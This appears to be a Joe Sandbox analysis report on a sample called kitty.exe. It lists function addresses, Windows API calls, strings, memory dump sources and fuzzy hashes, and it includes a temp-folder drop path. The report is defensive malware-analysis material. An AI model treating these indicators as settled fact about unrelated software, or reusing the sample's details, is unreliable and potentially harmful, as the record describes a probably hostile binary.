Instruction Fuzzy Hash: C4111CB1554F18AAD620BBB4CC47FDB7F9DAF04740F804815B29FAA093EB65B5248F50

Function 001FCFB6 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 001FCFFE
__fassign.LIBCMT ref: 001FD1E3
__fassign.LIBCMT ref: 001FD200
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001FD248
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001FD288
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001FD330

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 0e06d65ba7ba3b526de11b402636500e1b83d9f0cf8dc5ef808141f10ae9c2cc
Instruction ID: be596771845192d64a9668931a5ee8edde1c534aaaeddd5bc8cd3b26d7cbc2b8
Opcode Fuzzy Hash: 0e06d65ba7ba3b526de11b402636500e1b83d9f0cf8dc5ef808141f10ae9c2cc
Instruction Fuzzy Hash: 87C17BB5D0025C9FCB15CFA8E9809FDBBB6AF19304F28416AE955BB342D7319906CB60

Function 001E10A0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 482COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 001E1105
_strcspn.LIBCMT ref: 001E1127
Concurrency::cancel_current_task.LIBCPMT ref: 001E15A8

Strings

x , xrefs: 001E10DB
| , xrefs: 001E10E5

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _strcspn$Concurrency::cancel_current_task
String ID: x $|
API String ID: 3527581669-1981346704
Opcode ID: 6b3fa2332383db38b6b52645ef52c1502fe357e2eb61d599e0dd8961e76f1c1f
Instruction ID: efcf0da5e805b48e6362ea3d9ddad94770eb1d2a2581d0f4f62aa6741db21967
Opcode Fuzzy Hash: 6b3fa2332383db38b6b52645ef52c1502fe357e2eb61d599e0dd8961e76f1c1f
Instruction Fuzzy Hash: 1902B071A00649AFCB18DFA9C8909FEBBF9FF49304F144269E915A7251D731ED41CBA0

Function 001EF67C Relevance: 9.2, APIs: 6, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 001EF707
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001EF795
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001EF807
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001EF821
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001EF884
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 001EF8A1

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: f47ec19c140ce0f5f0f09afe580b32a05f1f74c0065d18e815ff5daf98446cfa
Instruction ID: d812774848027555f4657b4eb5ff7689e1fd10426af9d5bf896805234b217b26
Opcode Fuzzy Hash: f47ec19c140ce0f5f0f09afe580b32a05f1f74c0065d18e815ff5daf98446cfa
Instruction Fuzzy Hash: 5B71B432D00A8A9BDF219FA6DC45EEEBBB6EF49710F15017DED05A6191DB31C902CB60

Function 001EF442 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001EF48B
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 001EF4F6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF513
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001EF552
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF5B1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001EF5D4

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 60cea74e88f2d5bb0951b26f7dbabf3592361c2f81f381359be0d166dc7fe086
Instruction ID: 19d8fa7fe5638a036207c49107a06069cf19c845f104cff2a180753b158f8d85
Opcode Fuzzy Hash: 60cea74e88f2d5bb0951b26f7dbabf3592361c2f81f381359be0d166dc7fe086
Instruction Fuzzy Hash: 0351EF7250064AABEB209FA6DC44FAF7BA9EF64740F254439FD15E6090DB30DD42CB90

Function 001D1A50 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001D1A62
std::_Lockit::_Lockit.LIBCPMT ref: 001D1A7D
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1A9D
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1AEE
std::_Facet_Register.LIBCPMT ref: 001D1B50
std::_Lockit::~_Lockit.LIBCPMT ref: 001D1B68

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 8707202b30c90c8f92a6eaede488c2506688174df3cec783e6af1fb09def5306
Instruction ID: 3f0b2bd6b0477994b8af41720bd5fe16b92558ca6c982f8cd10ec1ff0ffe489b
Opcode Fuzzy Hash: 8707202b30c90c8f92a6eaede488c2506688174df3cec783e6af1fb09def5306
Instruction Fuzzy Hash: C631B035A01214BBCB24DF99E8819EDB7B4EF20710B1581AAEC099B351EB31ED41CB80

Function 001D40F0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 001D43BE
__fread_nolock.LIBCMT ref: 001D43E2

Strings

ios_base::eofbit set, xrefs: 001D4211
ios_base::failbit set, xrefs: 001D420C, 001D4278
ios_base::badbit set, xrefs: 001D4202, 001D4228

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: __fread_nolock
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2638373210-1866435925
Opcode ID: 2cde7e7afcc765a445460ac2235d5ab1b2557ea8acec3198410b2ffc6cf99f9a
Instruction ID: 00a818aab3e1ff865cf4d0d5819f491eb9e1045cbd6e65171e06f3dffbcade63
Opcode Fuzzy Hash: 2cde7e7afcc765a445460ac2235d5ab1b2557ea8acec3198410b2ffc6cf99f9a
Instruction Fuzzy Hash: C4A16A36A002189FCB18CF6CD881AAE77A5FF94320F1582AAED19DB355D731ED51CB90

Function 001F2ABA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001F2AB1,001F195B,001F0747), ref: 001F2AC8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001F2AD6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001F2AEF
SetLastError.KERNEL32(00000000,001F2AB1,001F195B,001F0747), ref: 001F2B41

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d60d2d1ca71625b7a4473d636151daeeecb2eb185f8a5041b9458b62d1dfdddf
Instruction ID: 177f855dada3160c03b99bbc7a67f2de4ecd4f95285661209d38dd85da859546
Opcode Fuzzy Hash: d60d2d1ca71625b7a4473d636151daeeecb2eb185f8a5041b9458b62d1dfdddf
Instruction Fuzzy Hash: CD01F73211D7195FEB392FB47C89ABA2B55EB35774721022AFF28A51E1EFA28C025150

Function 00203C8A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe, xrefs: 00203C8F

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe
API String ID: 0-706622493
Opcode ID: e0ce398d7090e90741c6e730533e1d789f7cc461b6a9533c80e803beb74408d5
Instruction ID: 7febc3f098bdd7ab9ff8b4a35d308d5f694de7fae73388ba41852eb6fe599a4e
Opcode Fuzzy Hash: e0ce398d7090e90741c6e730533e1d789f7cc461b6a9533c80e803beb74408d5
Instruction Fuzzy Hash: 0C21BE7122830ABFDB14EF618C80D7A77ADAF503747104514F518DB1D2EB31EE2087A0

Function 001F3B52 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,001F3C13,?,?,0021FB4C,00000000,?,001F3D3E,00000004,InitializeCriticalSectionEx,00210988,mscoree.dll,00000000), ref: 001F3BE2

Strings

api-ms-, xrefs: 001F3BA2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e9446244ad60713867ba962e39720750265a8b156987b0eb1585b5f04745d2c0
Instruction ID: 21ad919e39fd0ee7e222373774d94ab31221719688420ec8ddfde584b9c9258e
Opcode Fuzzy Hash: e9446244ad60713867ba962e39720750265a8b156987b0eb1585b5f04745d2c0
Instruction Fuzzy Hash: A911A935A4572DABDB324B69AC68BBA77949F127A0F250111FA25E72C0DB70EE0086D1

Function 001F57A2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001F5797,?,?,001F575F,00000001,00000000,?), ref: 001F57B7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F57CA
FreeLibrary.KERNEL32(00000000,?,?,001F5797,?,?,001F575F,00000001,00000000,?), ref: 001F57ED

Strings

mscoree.dll, xrefs: 001F57B0
CorExitProcess, xrefs: 001F57C2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6934cc73a44b35b68bf8d5884bd77c2f427e000e52dcfdf3b6172a70190a583d
Instruction ID: 5a95a4752d1ed3cf1310e92db95ad2ffb1ffda74f8863f0094e0ab4e20f591ae
Opcode Fuzzy Hash: 6934cc73a44b35b68bf8d5884bd77c2f427e000e52dcfdf3b6172a70190a583d
Instruction Fuzzy Hash: F6F08230901719FBDB119B91ED0DBAEBEA6EB00756F000150B604A2161CB708E40DA91

Function 002052E8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00205300

Part of subcall function 001FBF97: HeapFree.KERNEL32(00000000,00000000,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?), ref: 001FBFAD
Part of subcall function 001FBF97: GetLastError.KERNEL32(?,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?,?), ref: 001FBFBF

_free.LIBCMT ref: 00205312
_free.LIBCMT ref: 00205324
_free.LIBCMT ref: 00205336
_free.LIBCMT ref: 00205348

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 076606778a8ce6505720394a9e9e8bc3034c02cd737374706ad5e3caf767ea26
Instruction ID: cbbf051e7c23b05ac4639cb03d0d167ae3d0a68aad70086cd600df90ebe15c99
Opcode Fuzzy Hash: 076606778a8ce6505720394a9e9e8bc3034c02cd737374706ad5e3caf767ea26
Instruction Fuzzy Hash: 04F0AF72518714ABCB20EF14FCC6C5B7BD9BA243903550804F50DD3042CB70FC908E60

Function 001D1CC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 001D1D46

Strings

ios_base::eofbit set, xrefs: 001D1E95
ios_base::failbit set, xrefs: 001D1E90
ios_base::badbit set, xrefs: 001D1E86, 001D1EAF

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Initstd::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-1866435925
Opcode ID: f8cb62562f87c9d0d17c09f00b1bd0e99cc6b29ee9ea8d86d57b9328d8786a4a
Instruction ID: 9bc8389f6c8e599acbe789ce1c20c60d450b41bb6c736e237a8c4e3ae2367aa9
Opcode Fuzzy Hash: f8cb62562f87c9d0d17c09f00b1bd0e99cc6b29ee9ea8d86d57b9328d8786a4a
Instruction Fuzzy Hash: 7A6156B5A00305AFDB10CF58C885B9ABBF4FF48300F1484AAED099B386D775E915CBA1

Function 001D23F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001D254F

Strings

ios_base::eofbit set, xrefs: 001D24F2
ios_base::failbit set, xrefs: 001D24ED
ios_base::badbit set, xrefs: 001D24E3, 001D250C, 001D2533

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: 3d8f335698b147c825720adcfe9c9f6f9b33810e26f0258117544514d164aaca
Instruction ID: 4de0dd296513d6885ba6111eaac6a510037e2b031ff64b35f88d6fbed578e29a
Opcode Fuzzy Hash: 3d8f335698b147c825720adcfe9c9f6f9b33810e26f0258117544514d164aaca
Instruction Fuzzy Hash: 1C51DC766016049FCB20CF58C880E99F7F4FF68314B1481AAED299B752D731ED15CBA0

Function 001D1ED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 001D1F88

Strings

ios_base::eofbit set, xrefs: 001D2032
ios_base::failbit set, xrefs: 001D202D
ios_base::badbit set, xrefs: 001D2023, 001D204C

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Initstd::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-1866435925
Opcode ID: 52d6878ef05792fc47ad7f859d075f0d4cdaf09d85736d72afd251630956568c
Instruction ID: 1b03aca64731bc32e4d47009de21b37d563912c23e06f7ff7c490edfa78ae0ef
Opcode Fuzzy Hash: 52d6878ef05792fc47ad7f859d075f0d4cdaf09d85736d72afd251630956568c
Instruction Fuzzy Hash: 2341ACB0600705AFEB20DF65C498B5ABBF4BF14304F44856EE95A8B782D7B5E918CB90

Function 001E4210 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 001E4279

Part of subcall function 001EE8C0: std::_Lockit::_Lockit.LIBCPMT ref: 001EE8D2
Part of subcall function 001EE8C0: std::locale::_Setgloballocale.LIBCPMT ref: 001EE8ED
Part of subcall function 001EE8C0: _Yarn.LIBCPMT ref: 001EE903
Part of subcall function 001EE8C0: std::_Lockit::~_Lockit.LIBCPMT ref: 001EE943

Strings

ios_base::eofbit set, xrefs: 001E431E
ios_base::failbit set, xrefs: 001E4319
ios_base::badbit set, xrefs: 001E430F, 001E4338

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 238635018-1866435925
Opcode ID: 367e4ea321a4d6305ab00b3036ac7b102118a0eb6cd65aefc8b0787d50b23b0a
Instruction ID: 3a40884fc146a07d62e30b8f0838c75ea9b8fa4a874ce19762ce7fa747bee227
Opcode Fuzzy Hash: 367e4ea321a4d6305ab00b3036ac7b102118a0eb6cd65aefc8b0787d50b23b0a
Instruction Fuzzy Hash: 9D31DFB1900B459FE720DF65C445B5BBBF4BF54304F048A2DE94A8B682E7B5F808CB81

Function 001DE8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 001DE947
CloseHandle.KERNEL32(?), ref: 001DE95A
CloseHandle.KERNEL32(?), ref: 001DE95F

Strings

D, xrefs: 001DE8FA

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: cc434f9454047e2f2726f8421d436691215986bbaa4315bc0da2105275464565
Instruction ID: 0cd558450300451471d022df97221aa5f37aa2f58061b7887a760dd874f06c1f
Opcode Fuzzy Hash: cc434f9454047e2f2726f8421d436691215986bbaa4315bc0da2105275464565
Instruction Fuzzy Hash: BB318E32E1021DABDB14DF94CD45BEEBBB6BFA9315F24520AE5047B284D7B06980CBD0

Function 0020B1C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0020B22E
_free.LIBCMT ref: 0020B23D
_free.LIBCMT ref: 0020B24C

Strings

|H , xrefs: 0020B218

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$EnvironmentVariable
String ID: |H
API String ID: 1464849758-2707729891
Opcode ID: f9c21547c0c2bacaee5250a02f11ce373b3dd06c1cbc40fd7ad119c3cf1c2f8e
Instruction ID: 7ac495e9af30f0bc63ede5ee2fbd17b3af8b7eecd5f7fa437f867803a9583fdb
Opcode Fuzzy Hash: f9c21547c0c2bacaee5250a02f11ce373b3dd06c1cbc40fd7ad119c3cf1c2f8e
Instruction Fuzzy Hash: 5C118F71C14359AFDF129FAADC815EEFFB8BF18314F44402AE904B2252D7304A54CBA0

Function 001FFF6B Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001FFFF5

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
Instruction ID: ff5b54cf3fc5a3c1d66d75d0f0a460e53675d34f56efc3421a78949a22f21215
Opcode Fuzzy Hash: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
Instruction Fuzzy Hash: 4FB147329203469FEB11CF68C8C1BFEBBB6EF55340F244169E8489B283D6749D11CB60

Function 001F2BD1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 001F2C98
___AdjustPointer.LIBCMT ref: 001F2CBB
